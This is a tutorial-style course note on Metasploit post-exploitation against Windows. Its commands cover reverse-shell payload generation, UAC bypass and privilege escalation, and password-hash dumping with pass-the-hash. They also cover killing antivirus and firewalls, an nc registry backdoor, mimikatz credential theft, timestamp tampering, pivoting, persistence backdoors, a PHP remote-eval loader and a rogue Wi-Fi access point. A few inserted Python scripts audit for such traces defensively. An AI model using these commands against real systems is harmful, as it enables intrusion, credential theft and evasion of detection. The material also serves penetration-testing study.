Kali Linux Penetration Testing 146 Metasploit Post-Exploitation Phase

This article records the detailed process of learning and using Kali Linux 2018.1 for penetration testing. The material follows the course "Kali Linux Penetration Testing" from the Security Niu Classroom.

Kali Linux Penetration Testing (Yuan Fanghong) Blog Record

1. Preparations

  • Expand your results after gaining control of the target system

    • Privilege escalation
    • Information gathering
    • Pivoting into the intranet
    • Persistent backdoor
  • Expand your results based on an existing session

    • msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o payload.exe
  • Kali monitor

    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set LHOST 10.0.0.128
    msf exploit(multi/handler) > exploit -j
    
  • Windows system executes payload.exe

  • Interact with the meterpreter session from Kali

    msf exploit(multi/handler) > sessions 
    
    Active sessions
    ===============
    
      Id  Name  Type                     Information             Connection
      --  ----  ----                     -----------             ----------
      1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
    
    msf exploit(multi/handler) > sessions -i 1
    [*] Starting interaction with 1...
    
    meterpreter > getuid
    Server username: WIN7-VM\John
    

2. Obtain SYSTEM account privileges

  • Privilege escalation failed, usually due to UAC restrictions

    meterpreter > getuid
    Server username: WIN7-VM\John
    meterpreter > load priv
    [-] The 'priv' extension has already been loaded.
    meterpreter > getsystem 
    [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
    [-] Named Pipe Impersonation (In Memory/Admin)
    [-] Named Pipe Impersonation (Dropper/Admin)
    [-] Token Duplication (In Memory/Admin)
    
    
    meterpreter > background
    
  • Bypass UAC restrictions

    • use exploit/windows/local/ask

      use exploit/windows/local/ask
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      set FILENAME win_update.exe
      set SESSION 1
      exploit
      

      meterpreter > getsystem
      meterpreter > getuid
      

    • use exploit/windows/local/bypassuac

      use exploit/windows/local/bypassuac
      set SESSION 1
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      show targets
      exploit
      

    • use exploit/windows/local/bypassuac_injection

      use exploit/windows/local/bypassuac_injection
      set SESSION 1
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      exploit
      

  • Exploit a local vulnerability to escalate directly to SYSTEM

    • use exploit/windows/local/ms13_053_schlamperei

      use exploit/windows/local/ms13_053_schlamperei
      set SESSION 1
      

    • use exploit/windows/local/ms13_081_track_popup_menu

      use exploit/windows/local/ms13_081_track_popup_menu
      set SESSION 1
      exploit
      

    • use exploit/windows/local/ms13_097_ie_registry_symlink

      use exploit/windows/local/ms13_097_ie_registry_symlink
      set SESSION 1
      set URIPATH /
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      set SRVHOST 10.0.0.128
      exploit
      
    • use exploit/windows/local/ppr_flatten_rec

      use exploit/windows/local/ppr_flatten_rec
      set SESSION 1
      exploit
      

  • Graphical payload

    • set payload windows/vncinject/reverse_tcp

      use exploit/windows/local/ppr_flatten_rec
      set payload windows/vncinject/reverse_tcp
      set SESSION 1
      set LHOST 10.0.0.128
      set ViewOnly false
      exploit
      

  • Turn off UAC

    • Dump the password hashes

      meterpreter > hashdump
          Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
          Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
          John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
      
    • Try psexec with the dumped hash

      use exploit/windows/smb/psexec
      set RHOST 10.0.0.132
      set SMBUser John
      set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      exploit
      

      Error: Exploit failed [no-access]

    • UAC must be turned off first

      sessions -i 2
      shell
      cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
      shutdown -r -t 0
      

    • Retry psexec

      use exploit/windows/smb/psexec
      set RHOST 10.0.0.132
      set SMBUser John
      set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      exploit
      
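As an added defender-side check (not part of the original notes): the hashdump output above is in pwdump format (`user:RID:LM:NT:::`), and all three accounts carry the well-known hash values of an empty password. The script below parses such output and flags accounts with a blank password or with an LM hash still stored; the sample rows are constructed.

```python
import re

# Well-known hash values that hashdump prints for an account with an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One pwdump-style row: user:RID:LM:NT:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I
)

def parse_hashdump(text):
    """Parse hashdump output into dicts; lines that are not pwdump rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["rid"] = int(row["rid"])
            row["lm"], row["nt"] = row["lm"].lower(), row["nt"].lower()
            rows.append(row)
    return rows

def audit_hashdump(text):
    """Return {user: [findings]} for the accounts a defender should act on."""
    findings = {}
    for row in parse_hashdump(text):
        issues = []
        if row["nt"] == EMPTY_NT:
            issues.append("blank password")   # the account can be used with no password at all
        if row["lm"] != EMPTY_LM:
            issues.append("LM hash present")  # LM hashing still enabled; trivially crackable
        if issues:
            findings[row["user"]] = issues
    return findings

# Constructed sample in the format shown above; the last two rows use made-up hash values.
SAMPLE = """\
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backup:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
svc_sql:1002:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""

if __name__ == "__main__":
    for user, issues in audit_hashdump(SAMPLE).items():
        print(f"{user}: {', '.join(issues)}")
```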

4. Basic operations

1. Turn off the firewall

  • Requires administrator or SYSTEM privileges

    netsh advfirewall set allprofiles state on
    netsh advfirewall set allprofiles state off
    

2. Stop Windows Defender (the WinDefend service)

  • View the service name

  • Stop the service

    net stop windefend
    

3. BitLocker encryption

  • manage-bde -off C:
  • manage-bde -status C:

4. Turn off DEP

  • bcdedit.exe /set {current} nx AlwaysOff

5. Kill antivirus software

  • run killav
  • run post/windows/manage/killav

6. Enable Remote Desktop Services

    # Enable the service
    run post/windows/manage/enable_rdp

    # Disable the service again (run the clean-up resource file)
    run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt

    # Enable the service with the getgui script
    run getgui -e
    run getgui -u yuanfh -p pass
    run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc

7. View the remote desktop

  • screenshot
  • use espia
    • screengrab

5. Attacking Domain Controllers Using Tokens

  • Tokens

    • A temporary token is bound to the account each time the user logs on
    • The token is presented for authentication whenever a resource is accessed, much like a web cookie
    • Delegate tokens: interactive logon sessions
    • Impersonate tokens: non-interactive logon sessions
    • A delegate token changes when the account logs off; an impersonate token's permissions remain valid
  • Incognito

    • A standalone tool, integrated into meterpreter by MSF
    • Steals tokens and impersonates another user without needing the password or cracking the password hash
    • Especially suited to privilege escalation and lateral movement across many systems in a domain environment
  • Build a domain environment

    • DC + XP
  • load incognito

    • list_tokens -u
    • impersonate_token lab\administrator
    • Running the above command requires getsystem first
      • A standard local user must first obtain local SYSTEM privileges
      • use exploit/windows/local/ms10_015_kitrap0d
      • execute -f cmd.exe -i -t # -t: run the program with the currently impersonated token
      • shell

8. Registry

  • The registry holds almost all of Windows' configuration parameters

    • Improper modification can crash the system outright
    • Make a full backup of the registry before modifying it
    • Some registry modifications are irreversible
  • Common uses

    • Modify and add startup items
    • Steal confidential information stored in the registry
    • Bypass file-based virus detection
  • Add an nc backdoor service via the registry (meterpreter)

    • meterpreter >
    • upload /usr/share/windows-binaries/nc.exe C:\windows\system32
    • reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
    • reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
    • reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
  • Open firewall ports (meterpreter)

    • meterpreter >
    • execute -f cmd -i -H
    • netsh firewall show opmode
    • netsh firewall add portopening TCP 4444 "test" ENABLE ALL
    • shutdown -r -f -t 0
    • nc 10.0.0.132 444
  • Other registry keys
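An added defender-side check, not from the original notes, covering both the EnableLUA / LocalAccountTokenFilterPolicy changes from section 2 and the nc Run-key backdoor above: it parses `reg query` text output (the sample below is constructed) and reports UAC weakening and boot-time entries that look like a listening shell. The Run-entry patterns are heuristics I am assuming for illustration, not a complete detection.

```python
import re

SYSTEM_POLICY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Assumed heuristics for a Run entry that behaves like the nc backdoor described above.
SUSPICIOUS_RUN = [
    (re.compile(r"\bnc(at)?\.exe\b", re.I), "netcat started at boot"),
    (re.compile(r"\s-e\s+(cmd|powershell)(\.exe)?\b", re.I), "spawns a shell for whoever connects"),
]
def parse_reg_query(text):
    """Parse `reg query` text output into {key: {value_name: (type, data)}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if raw[:1] not in (" ", "\t") and line.upper().startswith("HK"):
            current = line                                  # an unindented line names the key
            keys.setdefault(current, {})
            continue
        parts = re.split(r"\s{2,}", line, maxsplit=2)       # name  TYPE  data
        if current and len(parts) == 3 and parts[1].startswith("REG_"):
            keys[current][parts[0]] = (parts[1], parts[2])
    return keys

def audit_registry(text):
    """Return findings for UAC weakening and backdoor-style Run entries."""
    keys = parse_reg_query(text)
    findings = []
    policy = keys.get(SYSTEM_POLICY, {})
    if policy.get("EnableLUA", ("", "0x1"))[1].lower() in ("0x0", "0"):
        findings.append("UAC disabled: EnableLUA=0")
    if policy.get("LocalAccountTokenFilterPolicy", ("", "0x0"))[1].lower() in ("0x1", "1"):
        findings.append("remote UAC filtering off: LocalAccountTokenFilterPolicy=1")
    for name, (_, data) in keys.get(RUN_KEY, {}).items():
        for pattern, why in SUSPICIOUS_RUN:
            if pattern.search(data):
                findings.append(f"Run entry '{name}': {why} ({data})")
                break
    return findings

# Constructed `reg query` output modelled on the changes made in the notes above.
SAMPLE = r"""HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x0
    LocalAccountTokenFilterPolicy    REG_DWORD    0x1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
"""
```

Running `audit_registry(SAMPLE)` on the sample yields the two UAC findings followed by one finding for the nc entry; the VMware entry is left alone.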

9. Packet capture

  • Packet capture (meterpreter)
    • load sniffer
    • sniffer_interfaces
    • sniffer_start 2
    • sniffer_dump 2 1.cap
    • Captured packets (up to 50,000) are kept in a ring buffer in memory and never written to disk
    • Meterpreter's own traffic is filtered out automatically, and the entire transfer is protected by SSL/TLS encryption
  • decoding
    • use auxiliary/sniffer/psnuffle
    • set PCAPFILE /root/1.cap

10. Search files

  • search -f *.ini
  • search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx

11. Cracking weak passwords

  • John the Ripper cracks weak passwords

    • use post/windows/gather/hashdump # requires a meterpreter session with SYSTEM privileges
    • run # results are saved in the /tmp directory
    • use auxiliary/analyze/jtr_crack_fast
    • run

12. Erasing traces

  • File-system access leaves traces, and those traces are the focus of digital forensics
  • Penetration testers and attackers alike often want to destroy traces of file-system access
  • The best way to avoid forensic detection: don't touch the file system at all

    • This is meterpreter's innate advantage (it runs entirely in memory)
  • MAC times (Modified / Accessed / Changed)

    • ls -l --time=atime/mtime/ctime 1.txt
    • stat 1.txt
    • touch -d "2 days ago" 1.txt
    • touch -t 1501010101 1.txt
  • MACE: stored in the MFT entry

    • MFT: Master File Table of the NTFS file system
    • Each entry is usually 1024 bytes (two disk sectors); the table stores information for many entries
    • It contains a great deal of file information (size, name, directory location, disk location, creation date)
    • For more detail, study file-system forensic analysis techniques
  • Timestomp (meterpreter)

    • timestomp -v 1.txt
    • timestomp -f c:\autoexec.bat 1.txt
      -b -r # erase MACE time information; this option currently does not work
    • -m / -a / -c / -e / -z
    • timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt
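Added example, not from the original notes: the touch and timestomp commands above set timestamps to whole seconds, and on Linux ctime cannot be set from user space, so a backdated file leaves traces a forensic check can spot. The script applies those heuristics (assumed for illustration, not a forensic standard) to files in a temporary directory, one of which is backdated the way `touch -t 1501010101 1.txt` would be.

```python
import os
import tempfile
import time

ONE_YEAR = 365 * 86400

def timestamp_anomalies(path, now=None):
    """Assumed heuristics for a file whose times were set by touch/timestomp-style tools:
    whole-second mtime or atime (times set by the kernel carry nanoseconds), an mtime in
    the future, and an mtime far older than ctime (Linux does not let user space set ctime)."""
    st = os.stat(path)
    now = time.time() if now is None else now
    issues = []
    for label, ns in (("mtime", st.st_mtime_ns), ("atime", st.st_atime_ns)):
        if ns % 1_000_000_000 == 0:
            issues.append(f"{label} has zero fractional seconds")
    if st.st_mtime > now + 60:
        issues.append("mtime is in the future")
    if st.st_ctime - st.st_mtime > ONE_YEAR:
        issues.append("mtime predates ctime by more than a year")
    return issues

def demo():
    """Create a normal file and a backdated one in a temp dir; return both result lists."""
    with tempfile.TemporaryDirectory() as d:
        normal = os.path.join(d, "normal.txt")
        stomped = os.path.join(d, "backdated.txt")
        for p in (normal, stomped):
            with open(p, "w") as f:
                f.write("sample\n")
        # Same effect as `touch -t 1501010101 1.txt` from the notes above:
        # 2015-01-01 01:01:00 to the whole second, with no nanosecond part.
        backdated = int(time.mktime((2015, 1, 1, 1, 1, 0, 0, 0, -1)))
        os.utime(stomped, (backdated, backdated))
        return timestamp_anomalies(normal), timestamp_anomalies(stomped)

if __name__ == "__main__":
    for name, result in zip(("normal.txt", "backdated.txt"), demo()):
        print(name, "->", result or ["no anomalies"])
```

The whole-second check alone gives false positives on file systems without sub-second timestamps, which is why the ctime comparison is included as a second signal.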

13. Pivoting (using a compromised host as a springboard)

  • Generate the payload with msfvenom
    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b "\x00\xff" -e x86/shikata_ga_nai -f exe -o payload.exe
  • Get system permissions

  • Use an already compromised computer as a springboard for intrusion into the intranet

  • From the point of view of the other intranet computers, all access comes from the springboard
  • run autoroute -s 1.1.1.0/24 # intranet segment of the target, which cannot reach the external network

  • Autoroute in a realistic scenario

    • Use Win7 to attack the intranet XP host (compare XP with and without access to the external network)
      • Scan the intranet: use auxiliary/scanner/portscan/tcp
  • Port forwarding portfwd for Pivoting

    • Use the already compromised computer to forward ports between Kali and the target
    • portfwd add -L LIP -l LPORT -r RIP -p RPORT
    • portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
    • portfwd list / delete / flush
  • use exploit/windows/smb/ms08_067_netapi

    • set RHOST 127.0.0.1
    • set LHOST 2.1.1.10
  • use exploit/multi/handler
    • set ExitOnSession false

14. POST module

  • meterpreter >
  • run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24
  • run post/windows/gather/checkvm
  • run post/windows/gather/credentials/credential_collector
  • run post/windows/gather/enum_applications
  • run post/windows/gather/enum_logged_on_users
  • run post/windows/gather/enum_snmp
  • run post/windows/manage/delete_user USERNAME=yuanfh
  • run post/multi/recon/local_exploit_suggester
  • run post/multi/gather/env
  • run post/multi/gather/firefox_creds
  • run post/multi/gather/ssh_creds
  • run post/multi/gather/check_malware REMOTEFILE=c:\a.exe
  • run hostsedit -e 1.1.1.1,www.baidu.com
  • migrate -N explorer.exe
  • run [tab] [tab]
  • run winenum

  • Automatically run meterpreter scripts

    • set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
    • set InitialAutoRunScript checkvm
  • Automatically run post modules

    • set InitialAutoRunScript migrate -n explorer.exe
    • set AutoRunScript post/windows/gather/dumplinks

15. Persistent backdoors

  • A meterpreter session obtained by exploiting a vulnerability lives only in memory; it does not survive a reboot
  • Repeating the exploit may crash the service
  • A persistent backdoor guarantees remote control even after the vulnerability is fixed

  • meterpreter backdoor (metsvc)

    • run metsvc -A # remove with -r
    • use exploit/multi/handler
    • set PAYLOAD windows/metsvc_bind_tcp
    • set LPORT 31337
    • set LIST 1.1.1.1
  • persistent backdoor

    • run persistence -h
    • run persistence -X -i 10 -p 4444 -r 10.0.0.128
    • run persistence -U -i 20 -p 4444 -r 10.0.0.128
    • run persistence -S -i 20 -p 4444 -r 10.0.0.128

16. mimikatz of msf extension usage

  • hashdump uses part of mimikatz's functionality
    • getsystem
    • load mimikatz
    • wdigest / kerberos / msv / ssp / tspkg / livessp
    • mimikatz_command -h
    • mimikatz_command -f a::
    • mimikatz_command -f samdump::hashes
    • mimikatz_command -f handle::list
    • mimikatz_command -f service::list
    • mimikatz_command -f crypto::listProviders
    • mimikatz_command -f winmine::infos # minesweeper game

17. Code Execution Vulnerabilities

  • PHP shell

    • msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
    • msf start listening
    • Upload to web site and access via browser
  • Web delivery

    • Exploit a code-execution vulnerability to make the target fetch and run a script from the attacker's server
    • use exploit/multi/script/web_delivery
    • set target 1
    • run
    • php -d allow_url_fopen=true -r "eval(file_get_contents('http://1.1.1.1/fTYWqmu'));"

18. RFI (remote file inclusion)

  • vi /etc/php5/cgi/php.ini
    • allow_url_fopen = On
    • allow_url_include = On
  • use exploit/unix/webapp/php_include
  • set LIST 1.1.1.2
  • set PATH /dvwa/vulnerabilities/fi/
  • set PHPURI /?page=XXpathXX
  • set HEADERS "Cookie:security=low;PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"
  • set payload php/meterpreter/reverse_tcp
  • set lhost 1.1.1.1
  • exploit

19. Karmetasploit

  • Fake AP, password sniffing, data capture, browser attacks
  • Resource file bundling many exploits: wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

  • Install other dependencies

    • gem install activerecord sqlite3-ruby
  • Infrastructure installation configuration

    • apt-get install isc-dhcp-server
    • cat /etc/dhcp/dhcpd.conf

      option domain-name-servers 10.0.0.1;
      default-lease-time 60;
      max-lease-time 72;
      ddns-update-style none;
      authoritative;
      log-facility local7;
      subnet 10.0.0.0 netmask 255.255.255.0 {
        range 10.0.0.100 10.0.0.254;
        option routers 10.0.0.1;
        option domain-name-servers 10.0.0.1;
      }
  • fake AP

    • airmon-ng start wlan0
    • airbase-ng -P -C 30 -e "FREE" -v wlan0mon
    • ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
    • touch /var/lib/dhcp/dhcpd.leases
    • dhcpd -cf /etc/dhcp/dhcpd.conf at0
  • Launch Karmetasploit

    • msfconsole -q -r karma.rc_.txt
  • Allow users to surf the Internet normally

  • Add routing and firewall rules

    • echo 1 > /proc/sys/net/ipv4/ip_forward
    • iptables -P FORWARD ACCEPT
    • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
